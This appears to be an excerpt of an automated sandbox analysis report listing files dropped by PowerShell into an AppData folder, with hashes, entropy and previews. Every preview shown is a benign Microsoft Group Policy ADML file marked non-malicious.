                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LinkLayerTopologyDiscovery.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (460), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3646
                                                                                          Entropy (8bit):4.907043755326407
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKIZNW4D5Drf3R5SMxeHJ/LLXdMD5ebqKrf3R5SfxeHJ/LLgX3jqS0:LeD5pmON3ljPep+sqajiep4X3jqSGvV
                                                                                          MD5:92DBAD98F0E768C7BFE966BD839BB017
                                                                                          SHA1:DE0047F6E6C1A639102804F0D9081783488BB331
                                                                                          SHA-256:14DAFF44ECBEC76CDE21CCC68D5558BD6119A5F58C6884B9692B6341EAD643DD
                                                                                          SHA-512:F74CAACA0D2CE8E4E8702E83E6F077C6BC17BC69CF2BE40698227FE003A7C1291F22D49CB3FEB50A8D418C1083EAE6767474F21AAC7F83A40620F6B461611723
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="LLTD_Category">Link-Layer Topology Discovery</string>.. <string id="LLTD_Category_Help">Configures all Link-Layer Topology Discovery components.</string>.. <string id="LLTD_EnableLLTDIO">Turn on Mapper I/O (LLTDIO) driver</string>.. <string id="LLTD_EnableLLTDIO_Help">This policy setting changes the operational behavior of the Mapper I/O network protocol driver.....LLTDIO allows a computer to discover the topology of a network it's connected to. It also allows a computer to initiate Quality-of-Servic

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LocationProviderAdm.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1212
                                                                                          Entropy (8bit):4.9162916170648305
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yYr2XjEEgr2WMb/fLqI2LHIQIeQLUgH7IYLjXr2cE5n:cgeD5x8gm8fKBqTETqRXLqbLoQWLUgbU
                                                                                          MD5:FE47798FE9B3F4C43E782DF1AF166A87
                                                                                          SHA1:909EE6F13A9F43305857C64DF1F2B8C91797A60B
                                                                                          SHA-256:F4EDEF9970D1E3EE016E880537DB88D7B6A3B5ABD142D791FC39D39FC4E1FFA9
                                                                                          SHA-512:3487FA625323C52C6BB52C09051CE0C5E41A1EAB45448C5471B2378DFDF6E478DF36E3424F08946B6F1C516E795E138CC87166DF81B4D463B5E04166949FE14E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableWindowsLocationProvider">Turn off Windows Location Provider</string>.. <string id="DisableWindowsLocationProvider_Explain">.. This policy setting turns off the Windows Location Provider feature for this computer..... If you enable this policy setting, the Windows Location Provider feature will be turned off, and all programs on this computer will not be able to use the Windows Location Provider feature..... If you disable or do not configure this policy setting, all programs on this

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Logon.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (587), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16832
                                                                                          Entropy (8bit):4.631442685712746
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:HD5n9zbzDznNtlY2iFwIcnBJGciF7BZXmhdtP0:nzbzDzn9YPJMGcitzmx0
                                                                                          MD5:7DEB6528B7BF721DA0BC53B65116E4B2
                                                                                          SHA1:999291B1970366D2256B0081EBE8420E6519D13E
                                                                                          SHA-256:CFF8BFAD325C4F3BE418A491D37BB367E126F24EE22FA39C809C83AED6C07033
                                                                                          SHA-512:BC22B74FF1FEA301961650160914422A5A986B7082C27140817E8ABE0E2720CB9578B8EF637182CBAE5CB7E3AC8481F4E334A815645E3F13A82163A7941FEC61
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="UseOEMBackground">Always use custom logon background</string> .. <string id="UseOEMBackground_Help">This policy setting ignores Windows Logon Background.....This policy setting may be used to make Windows give preference to a custom logon background. ....If you enable this policy setting, the logon screen always attempts to load a custom background instead of the Windows-branded logon background. ....If you disable or do not configure this policy setting, Windows uses the default Windows logon background or cu

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMC.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (374), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4806
                                                                                          Entropy (8bit):4.701920186548574
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmQsFOr1sf4h/p1IXr5KQ6A735FlZ+HQsvYxyOsFV:EsFOriforIkQ6A7zlZ+HvvYxyOsn
                                                                                          MD5:E7286B16AB9A79A941457D0E5F7AC2D9
                                                                                          SHA1:7E41AA47B450F332DAC6A9AEE8B1021397ACC90F
                                                                                          SHA-256:5CE95BDC6780550FAD262390A824CDB07D6B426683FE1E8AFA533D6A47A8E79B
                                                                                          SHA-512:5BCDA870EF7DCEDA95D4C44B8EDB9DB08BB937D5D5FB07601DE231BA21C7B7902A8D74F6A33352132C0F5D2E84C47E9AE855290444B76EDD6A59792BD8BD67C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC">Microsoft Management Console</string>.. <string id="MMC_ActiveXControl">ActiveX Control</string>.. <string id="MMC_ExtendView">Extended View (Web View)</string>.. <string id="MMC_ExtensionSnapins">Extension snap-ins</string>.. <string id="MMC_LinkToWeb">Link to Web Address</string>.. <string id="MMC_RESTRICT">Restricted/Permitted snap-ins</string>.. <string id="MMC_Restrict_Author">Restrict the user from entering author mode</string>.. <string id="MMC_restrict_Author_Explain"

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMCSnapIns2.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (332), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3258
                                                                                          Entropy (8bit):4.817177716053599
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKqgONUGM7MG1T7yvG/sFO3hsFaSb7AqIAF9dFpgJcJTU8OiFQBeQs:LeD5pmnGCpZ7r/sFgsFaK735Sf/cMeFV
                                                                                          MD5:181EDEAB7F0FA1FD7DA1D157121386D1
                                                                                          SHA1:B4F9B4B91FD9D8EFA327E20516DE975892A706F1
                                                                                          SHA-256:258D9502CBD3B2B6E342D1B705A17A6537865D066BEC2227BD4BD5A4D3E411F9
                                                                                          SHA-512:99FF5FD5A9E50F1AE843845CC54E616F73DE24270261496087E902AB5AAA286ED9C9A19DCB230857774834DF20AAA2056D052D905F12ACBB338C845BFE8D1B9D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_StorageManagerForSANSSnapIn">Storage Manager for SANs</string>.. <string id="MMC_StorageManagerForSANSSnapInExtension">Storage Manager for SANS Extension</string>.. <string id="MMC_FileServerResourceManagerSnapIn">File Server Resource Manager</string>.. <string id="MMC_FileServerResourceManagerSnapInExtension">File Server Resource Manager Extension</string>.. <string id="MMC_DiskManagementSnapInExtension">Disk Management Extension</string>.. <string id="MMC_DFSSnapIn">DFS Management</st

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MMCSnapins.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10156
                                                                                          Entropy (8bit):4.902850417863983
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Eha8zqIFaazk71nt3xuH+6gqb7UFfFaK7Oz/cExtqRACAmn:u2IFWke6gqHBcR9r
                                                                                          MD5:A30AB3FB1BA97BFD3AD477AD18D0BE28
                                                                                          SHA1:9175E307ED491957EEB303BC6BEB8F6ABB2EB0FB
                                                                                          SHA-256:48663270C2B2ED9475692772CBF5B12B635D75FA293E3059F8B81D8B4D02382E
                                                                                          SHA-512:13DD57C61196B2DAC93F8C4FF602ACEA6644B4DEA08FF96B2770C50EC98CE73A9F9C3CEA3BF29ED7A3E5089474F27653BFBBDFC515FB378965D107DDA252BF0D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MMC_ActiveDirDomTrusts">Active Directory Domains and Trusts</string>.. <string id="MMC_ActiveDirSitesServices">Active Directory Sites and Services</string>.. <string id="MMC_ActiveDirUsersComp">Active Directory Users and Computers</string>.. <string id="MMC_ADMComputers">Administrative Templates (Computers)</string>.. <string id="MMC_ADMUsers">Administrative Templates (Users)</string>.. <string id="MMC_ADSI">ADSI Edit</string>.. <string id="MMC_AppleTalkRouting">AppleTalk Routing</stri

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MSDT.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4822
                                                                                          Entropy (8bit):4.7368864262977635
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmtzIVVV78jVqaqGCs1HVVpLg2uw+F8c6mqSaM17CsQe2ce9e2bgzKDB2QSV:EL8jVqaTpCwSfqSaQpQe2c8e2SuS3l
                                                                                          MD5:CD6F4B94C65A6A5F650EEDCC4108C1F9
                                                                                          SHA1:BB95196861D768DE33C1A574CD3C3B05DE281B8B
                                                                                          SHA-256:91692970671C4A0AC5A872A787F7C8D5B7C69BC36503D2815408443EA7B820DB
                                                                                          SHA-512:41E53997E7FE19552B50DAE9B3E9DDC61289B69DFBD05A837A05E023D67B103DE17BC794CA897BB69DB59CBA6564471C26AD9B0C31811065E98C2270B1D67D5E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Microsoft Support Diagnostic Tool</string>.. <string id="WdiScenarioExecutionPolicy">Microsoft Support Diagnostic Tool: Configure execution level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines the execution level for Microsoft Support Diagnostic Tool.....Microsoft Support Diagnostic Tool (MSDT) gathers diagnostic data for analysis by support professionals.....If you enable this policy setting, administrators can use MSDT to collect and send di

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MSI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (499), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):30569
                                                                                          Entropy (8bit):4.629506484487412
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:S3fWPIaG5EBoj8lK1I8DBkpkBLNPn4WCMIb53woYlHMwIxTQMNBN2wJKPCoz1Nqb:7wI8DhTSb53w/4DRb
                                                                                          MD5:281E7FFCCBCB02FC616FEBF6F291B411
                                                                                          SHA1:EB918DDA656626758F3B4B993C12CB04BA7F18E3
                                                                                          SHA-256:BEA0490CA9E830B84869A273D0011683A54FA4E92E0EFF63B9F123CFFFC40C60
                                                                                          SHA-512:6C932E4F13F9FE7C0C38A92C85808138C8ACB0CA925A8B5B149CA3C0F081B90112C52A165E37DEB5A400E300386108A9CC8D8F75D68D697798E34B40325E270A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowLockdownBrowse">Allow users to browse for source while elevated</string>.. <string id="AllowLockdownBrowse_Help">This policy setting allows users to search for installation files during privileged installations.....If you enable this policy setting, the Browse button in the "Use feature from" dialog box is enabled. As a result, users can search for installation files even when the installation program is running with elevated system privileges.....Because the installation is running with elevated system p

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MediaCenter.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1133
                                                                                          Entropy (8bit):4.94325326862628
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDIuQF6FVMFV:cgeD5x8gm8fKbyqFV
                                                                                          MD5:7EFC78CEE6A256186F169D12466F667D
                                                                                          SHA1:C190C0FAB77A5095D595ED65CF1E0ADF81A9AE7E
                                                                                          SHA-256:DD91079C05795BD2BBA3C3F0A7167A5B8760A540C2E3000F379D4058D2E67258
                                                                                          SHA-512:B5A90208C5A69F90DB1F7C90B161E066FFDFF2761BECC314D1611709EFE31848D250A45EFFBF60356E71C00370A99252CE8D4ECB804683575528F5E6FCE7432A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MediaCenter">Windows Media Center</string>.. <string id="MediaCenter_Disable">Do not allow Windows Media Center to run</string>.. <string id="MediaCenter_Disable_Help">This policy setting allows or prevents Windows Media Center to run.....Windows Media Center is a digital media player and video recorder that allows users to organize and play music and videos, and to view and record live television.....If you enable this policy setting, Windows Media Center will not run.....If you disable or do not configu

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MobilePCMobilityCenter.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1205
                                                                                          Entropy (8bit):4.9534177597350935
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yLwjaMb3zjS/RmN3FooRFV:cgeD5x8gm8fKkqaM3a/RmNqAFV
                                                                                          MD5:F4ED8285AC3F6D33796ECEB5A7D654D7
                                                                                          SHA1:8856483D9DE028B8ADED5807E7F786E61BA9A969
                                                                                          SHA-256:94D9C7AAF148F31B6129B5567F963832427DE828DCD7E0B31F1BCBDBD5DBED3C
                                                                                          SHA-512:6B7A56459CCC4DDE7A3EE144334295653B394D5D6499E98FC0184244D6FE4B3BE38324492378EA88C4851133678287CD4C5381120F83488AE639279CBFC8A328
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MobilityCenterCat">Windows Mobility Center</string>.. <string id="MobilityCenterEnable">Turn off Windows Mobility Center</string>.. <string id="MobilityCenterEnableExplain">This policy setting turns off Windows Mobility Center.....If you enable this policy setting, the user is unable to invoke Windows Mobility Center. The Windows Mobility Center UI is removed from all shell entry points and the .exe file does not launch it.....If you disable this policy setting, the user is able to invoke Windows Mobility

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\MobilePCPresentationSettings.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1482
                                                                                          Entropy (8bit):4.847847941024891
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ycjpb3BnEndr90fFV:cgeD5x8gm8fKrV3Bn2RSfFV
                                                                                          MD5:3D1BC388407E64D128728E5259ADAC99
                                                                                          SHA1:AAF0BD72A00F01936A1B8CFF0DD9F43B4A5DEB06
                                                                                          SHA-256:EC7D1B396B99416F267F99BA8D7A81199284C01CAE1A19081F2670233FA02F20
                                                                                          SHA-512:68A27081AA8ABEAECED75720102C4712FCBFB0BF77918A8C47C62BA0EC4FA0F369DD605A91AF0B671DC079053F0A1328B6F5DBA9A0623E8B03095FCB65F6D83C
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PresentationSettingsCat">Presentation Settings</string>.. <string id="PresentationSettingsEnable">Turn off Windows presentation settings</string>.. <string id="PresentationSettingsEnableExplain">This policy setting turns off Windows presentation settings.....If you enable this policy setting, Windows presentation settings cannot be invoked.....If you disable this policy setting, Windows presentation settings can be invoked. The presentation settings icon will be displayed in the notification area. This wi

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Msi-FileRecovery.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3082
                                                                                          Entropy (8bit):4.810214089047188
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKyxgteEKvv4NYlVOdX71JDerq5x0BsYu9tP4XEgV:LeD5pmHWwua5PD2qjCsNtPeV
                                                                                          MD5:DA778ED24DE53EF1BAF75408032E34A8
                                                                                          SHA1:20B3E050E4094CDEA1765EFA73AE92DADF4D3F18
                                                                                          SHA-256:1FA3057260F8642ADAF7C30D68CBDF5703BCBE983ACBEB0335FD31347D8CE4CB
                                                                                          SHA-512:393A383F1CA87036A1893150514276B1277816CDAAC1704891D0345C1464D53B22C0ACD752EAF4B130EA8E3C40C3B4AC86FDADBBCD2F792414E79575C746BD82
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">MSI Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure MSI Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted MSI files to one of three states:....Prompt for Resolution: Detection, troubleshooting, and recovery of corrupted MSI applications will be turned on. Windows will prompt the user with a dialog box when application reinstallat

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NAPXPQec.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.0468646750436905
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ylySwH3ZhAEonuYNuEZsFV:cgeD5x8gm8fKiSYdmFV
                                                                                          MD5:A4208900FDE8B3665E5C81E299CA7BFF
                                                                                          SHA1:D15B972870FC4A1FBFF2E709DBC6AB031E4A46E6
                                                                                          SHA-256:156AC533DE885DE2086D1506713B46BFBCFDEB20FCD783B16C3CD4C143868549
                                                                                          SHA-512:A40CFC29E6C50B0CE4D98A1F9FFF71DBB17C8A33C7018BD9C4BD80BC31257D279F75057C3EEE1AC47F5A40FC16493D188CEFFAC7B0F5C70D16E22B1A492AC97D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NAP_Category">Network Access Protection</string>.. <string id="NAP_XP_1x_QEC">Allow the Network Access Protection client to support the 802.1x Enforcement Client component</string>.. <string id="NAP_XP_1x_Help">This policy setting allows the Network Access Protection (NAP) client to support the Windows XP version of the 802.1x Enforcement Client component.....If you enable this policy setting, NAP allows the Windows XP version of the 802.1x Wireless Enforcement Client to participate. ....If you disa

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NCSI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (417), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5609
                                                                                          Entropy (8bit):4.807720215972321
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:oD5pmB6SbbXVjG7/loPSNYOag8hW3QDFzdQFXukdFeYoZTe2FRA15VrpbWFo9FV:+jErVjGmighWmAd8KoPe
                                                                                          MD5:C62CBB79E2AF2E3CC1FD69206D0C9716
                                                                                          SHA1:3C18FFFC927A30CCD66B2D23D553BCA29642497D
                                                                                          SHA-256:5E583582C0A4A933C3A0E4A4270E034DE6B8DD23B2676A1ECAD986DB71F28E7D
                                                                                          SHA-512:B65C8F3EF4A1DBA11E8E915F8E31A874E83042923F98941CD8441066C103ABBB61A720BF24729CE17DEDC1916873BB86E7C5E1830D4AA96982EE0592E3830F2D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Connectivity Status Indicator Group Policy Settings</displayName>.. <description>Network Connectivity Status Indicator Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="NCSI_Category">Network Connectivity Status Indicator</string>.. <string id="NCSI_CorpWebProbeUrl">Specify corporate Website probe URL</string>.. <string id="NCSI_CorpWebProbeUrl_Help">This policy setting enables you to specify the URL of the corporate website, against which an active probe is performed.</string>.. <string id="NCSI_CorpDnsProbeHost">Specify corporate DNS probe host name</string>.. <string id="NCSI_CorpDnsPro

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Netlogon.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1008), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):46428
                                                                                          Entropy (8bit):4.777664679838725
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MwjkYrp+MHlkfrwiTrotseXkz4l/hHui7n421:/wYrcMHlkfrwiTrot3Xk8l9uM40
                                                                                          MD5:B6CB2AF44B11487F92D14A3E9B7B4F70
                                                                                          SHA1:DCFC1F715BD49D62021568F76D8CD3BBB85D01CF
                                                                                          SHA-256:14B401FBE6F5FD279430D383196F16AC0D93EE665D0225C7F2C4C3DD56D7B847
                                                                                          SHA-512:7373B5EFF0A8574961C7373CEF567071852FB57663978ED9E1A8BB2E9B6E4AB1390260204B518D40621AEC4B5F14A18793BE7D4550ADABBA0BDA11FFA90EEA6A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Netlogon">Net Logon</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain">Use DNS name resolution with a single-label domain name instead of NetBIOS name resolution to locate the DC</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain_Help">This policy setting specifies whether the computers to which this setting is applied attempt DNS name resolution of a single-label domain names.....By default, the behavior specified in the AllowDnsSuffixSearch is used. If the AllowDnsSuffixSearch policy is d

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\NetworkConnections.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1486), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):41991
                                                                                          Entropy (8bit):4.576451646468249
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:0dx8EooEviP1PjM6PtCldxD9xI2FzOkRZWx+LmCYvecgy3W7dlDelurmYEg4g+z/:iFOI
                                                                                          MD5:0F0684FA5CF664EAF158690457E68D92
                                                                                          SHA1:DFA272AD045597933D1144F01921EABA0B6BC4A4
                                                                                          SHA-256:E86F5AD0D0A55ED34D90A2EE7222564656C684FCA48F9CE2C0363266C7C10ECE
                                                                                          SHA-512:ED1BEF62FA7CECD3E618F31D951259704A13910E4AD3276C396003AF543EE6C6FBC86E4573366D6103D997B1C2DE98E879AE08BAB5676BE2F12579CBEDDD7D10
                                                                                          Malicious:false
